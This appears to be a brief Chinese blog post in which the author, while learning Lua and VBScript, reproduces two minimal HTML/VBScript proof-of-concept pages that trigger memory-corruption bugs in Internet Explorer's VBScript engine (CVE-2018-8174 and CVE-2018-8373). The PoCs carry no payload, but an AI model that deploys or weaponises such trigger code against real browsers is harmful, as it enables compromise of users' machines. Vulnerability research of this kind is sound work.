最近看了一下深度学习,用Lua 写的。。

然后前端时间又报出了2个vb的CVE ,看了看POC,很简单的溢出。

poc 如下:

CVE-2018-8174

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<html>
<meta http-equiv="X-UA-Compatible" content="IE=10" />
<script language="VBScript">

dim b
dim c
Class cla1

Private Sub Class_Terminate
set c = b
b = 0
End Sub

Function test
msgbox 3
End Function

End Class

set b = New cla1
b = 0

c.test

</script>
</html>

CVE-2018-8373

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<html>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<script type="text/vbscript">

Class MyClass
Dim array()

Private Sub Class_Initialize
ReDim array(2)
End Sub

Public Default Property Get P
ReDim Preserve array(1)
End Property
End Class

Set cls = New MyClass
cls.array(2) = cls

</script>
</html>

可恶啊。所以又搞了下 vb 的测试。

那么,就是学了下VBScript 和 Lua 。看看有没有什么值得记录一下的地方,抽空来接着写一些。